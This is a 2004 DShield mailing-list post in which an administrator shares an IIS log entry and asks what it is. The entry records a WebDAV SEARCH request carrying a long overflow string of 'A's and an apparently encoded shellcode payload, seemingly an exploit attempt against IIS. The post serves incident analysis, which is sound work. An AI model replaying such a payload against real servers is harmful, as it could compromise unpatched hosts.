[Dshield] anyone see this before as a IIS Verb Search?

DAN MORRILL dan_20407 at msn.com
Wed Apr 7 16:45:25 GMT 2004


Saw this in the logs this morning coming from a site in california. Anyone 
seen anything similar and know what it could be?

Cheers/r/Dan

2004-04-06 02:14:31 68.75.70.232 - W3SVC2 EXTMBWB2A Some>IP>HERE 80 SEARCH 
/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA?????????????????????????????????????####??????????rmomddddddisjhnegdddddddlohddplokdepnqlojldlloskjndiimrlimddddddrfsmlgrpehggpdidjlfrjikljijljljskgkhjlipkgkjjgloqpidjndjjndfididjlddddddhdigssejlgslsskhfmlosljnddlopjlgpdelidloilspiglgpddhidikssijdhidikssijdlillipdkhdmloqpggpdidigssijdpssijedieijlohigploihflkldgqiiflokffddgsiggpmhmhenqdgpiggqodsoredgnqjkhdlpepodqdgqnhdrosegoeskirkinloinfhdgqqjjlodpholoinepdgqqlodhlodgpinoirimpgrlhfssssssniekddkpeskmdnrlsomksqdsmlsrlndrrsprrdjdddgfddddddddddddhqinmddddgdddddddhddddddssssddddolddddddddddddddhdddddddddddddddddddddddddddddddddddddddddddddddddddddddddd
dddddddddddddrldddddddresondrddohdmpqfeoldehppqfeihjljmkgfdkdkfjsjkkfjejqfdjgjejrjrjskhfdjfjifdkfkijrfdjmjrfdhhhsigfdjqjsjhjifrdqdqdnfhddddddddddddddnigldipkreimjomhreimjomhreimjomhmnhijkmhrgimjomhjfhijimhrgimjomhlrhjjemhrnimjomhlrhjjsmhrgimjomhreimjnmhljimjomhjfiegjmhrlimjomhrkknjdmhrdimjomhifjmjgjlreimjomhddddddddddddddddddddddddddddddddddddddddddddddddidhiddddhpdedgddqdfkdnqrddddddddddddddddrddddsdedodeiqmrddgdddddddedddddddmdddddndpnddddddndddddddqdddddddddhdddddeddddddddfdddddhdddddddddddddddhddddddddddddddddrddddddddhdddddddddddddgddddddddddedddddedddddddddedddddedddddddddddddedddddddddddddddddddddddddqdddddgldeddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddmdddddddeddddddddddddddddhddd
dddddddddddddddddddddddddldddddrdddddddddddddddddddgdddddddndddddddfpdddddddhddddddddddddddddddddddddddddhdddddrdddddddddddddddddddedddddddqddddddddfddddddgdddddddddddddddddddddddddddddhdddddpdddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddsssseirlhdhdddrldddddqoplipdkigijldhdednjlkhngefidojsfppjpemrpedgpklfmsdiooosqhsfnsplgsldfkidirmdmdefpdhddhpsrqskrpmpgmdlerpdldfeflqhhfhddijiklogqglhehdsossompigpifrdjpqklgphdplqhpfhdljnddiejhkkjgosqqigrdhddirhhdkdgpfrlogihdsjkkkskgdifkdhs
sqjmmomdiirsksmloehmikliregqsmrhpqlifeejhfidkdsldkmdihlonookksslgplslhdlodhlilrqjfhknngqmmgdkomnmgggeijopkigodglsnsohjjgqjfnknpidoregfnqkjlmnqoqosssssseirlhdhdddrldddddqoplipdkigijldhdednjlkhngefidojsfppjpemrpedgpklfmsdiooosqhsfnsplgsldfkidirmdmdefpdhddhpsrqskrpmpgmdlerpdldfeflqhhfhddijiklogqglhehdsossompigpifrdjpqklgphdplqhpfhdljnddiejhkkjgosqqigrdhddirhhdkdgpfrlogihdsjkkkskgdifkdhssqjmmomdiirsksmloehmikliregqsmrhpqlifeejhfidkdsldkmdihlonookksslgplslhdlodhlihheilqlpfhehohidjlqlkgiesgkfhlikfhdesrehligpqmrqkhokneepiffmfhlpqpjlqnjdrskkqodpklfhdkdeopisirlephpmqokksgsqjsddlgrpedjlsljpogqpggpdpkrmkknsqogrgplmdkdldgdpsmegdhkdeeoooikkjgqeglfhskqleopddgkpphedhplfrmqrojjlpdefddjrheghkhkgmosssjngshnikokhghjndejnddjndffmipdldnofoeiljhdhlodsdgenkfreiorhdehsgdpfdlddjsnddejrjrfogpedigiikesgdfogimmlhesskqrkkrdslijpdqfpedrpnesdnieekhempkdiqlsromprkikoileknieddjesdjrproekoofkfkpseljhdddedlgpdhdplphpjkhld
lndmnehdskskkskesnllqdpldlofqpheqloeqpldilqdhhllqehldneklpkliqslhlfjqlmihjgkpgnfpksginegldroksorjdhdmsskhfoidgpegsphhjrmiesgoonerokehdsepidedldffqmlqnqsoqsssqgnldgjqqidnpphdeflipqlqoeejqjhsqdhdhlkdheeoioodrjnghpkmqklgjkehekdhkgmssqjqikiffkjlndfjghjjngqhqehqrlkrmqsodslhjgqdienegjjnsspmqhrmkjdqpspoelipoheldlereprrfedgejkoskeffpdhfhkpjlmdjekqeqeoqrpqlsilmrfqklngkdmggrdijlqdssqnqjdpililieqgmqlolosdlerjsspgqldpleddqknolgsndgkkeqssfhmijeslqsqpipeheqnmedperfeddgsfrodolojikqmdjsooeiperddpsdfoeodldsl 
- 404 0 0 33101 31 HTTP/1.1 127.0.0.1 - -
Sometimes MSN E-mail will indicate that the mesasge failed to be delivered. 
Please resend when you get those, it does not mean that the mail box is bad, 
merely that MSN mail is over worked at the time.

Otherwise, hope things are going well.
r/
Dan

_________________________________________________________________
FREE pop-up blocking with the new MSN Toolbar – get it now! 
http://toolbar.msn.com/go/onm00200415ave/direct/01/
More information about the list mailing list